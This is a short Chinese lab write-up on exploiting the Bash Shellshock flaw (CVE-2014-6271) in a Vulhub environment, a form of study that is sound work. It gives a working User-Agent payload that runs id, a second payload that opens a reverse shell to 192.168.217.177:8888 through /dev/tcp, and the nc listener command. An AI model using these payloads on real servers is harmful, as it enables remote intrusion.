Vulhub 中的 bash CVE-2014-6271

0x00 前言

声明:本文仅做学习交流,遵守《网络安全法》。

先学习原理,一个挺老的漏洞了。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。

总的来讲,攻击者通过控制变量进行远程代码执行。

0x01 CVE-2014-6271

先通过nmap进行端口扫描。

访问8080的时候发现是apache的主页面。

这样不行啊,这得扫描后台。

有新的收获。访问之后发现是很有名的 hello world。

要不是地址不同我还以为浏览器没什么变化呢。这怎么办?抓个包吧。在User-Agent处写上payload。

复制代码
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

成功看到用户id。那说明id这条命令已经被执行了,那就可以......

复制代码
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/192.168.217.177/8888 0>&1

开启nc之后,构造上面的poc。

复制代码
nc -nlvp 8888

BurpSuite没有回显,但是nc有回显了。

0x02 总结

一开始执行id的时候是没有回显的,以为是Burp的包构造问题,后来发现是payload构造的有问题。另外,在回弹shell的时候,由于payload写的有问题导致回弹失败。 //多打了一个"/" 真丢人

相关推荐
无限进步_1 分钟前
C++异常机制:抛出、捕获与栈展开
开发语言·c++·安全
Scott9999HH19 分钟前
高端胶原蛋白饮多品牌深度对比:抗皱机理、国际研发标准、气色维度,一套可直接用的选品框架
安全
2501_9151063226 分钟前
深入解析无源码iOS加固原理与方案,保护应用安全
android·安全·ios·小程序·uni-app·cocoa·iphone
一拳一个娘娘腔1 小时前
【SRC漏洞挖掘系列】第04期:文件上传与解析——把图片变成“特洛伊木马”
安全·web安全
探索者011 小时前
SQL注入深度解析笔记:从DNSlog外带到高级绕过技术
web安全·sql注入
宋浮檀s1 小时前
SQL注入基础+DVWA搭建
数据库·sql·安全·网络安全
宋浮檀s1 小时前
DVWA通关教程1
网络·安全·web安全
IT大白鼠1 小时前
Dirty Frag漏洞深度分析:Linux内核页缓存污染漏洞的技术原理与安全防护
linux·安全·dirty frag漏洞
祁白_1 小时前
[0xV01D]_Glass Parcel_writeUp
大数据·安全·ctf·writeup
上海知从科技2 小时前
SENT传输协议:汽车传感器数字化通信的最优解决方案
科技·安全·汽车·软件工程·汽车电子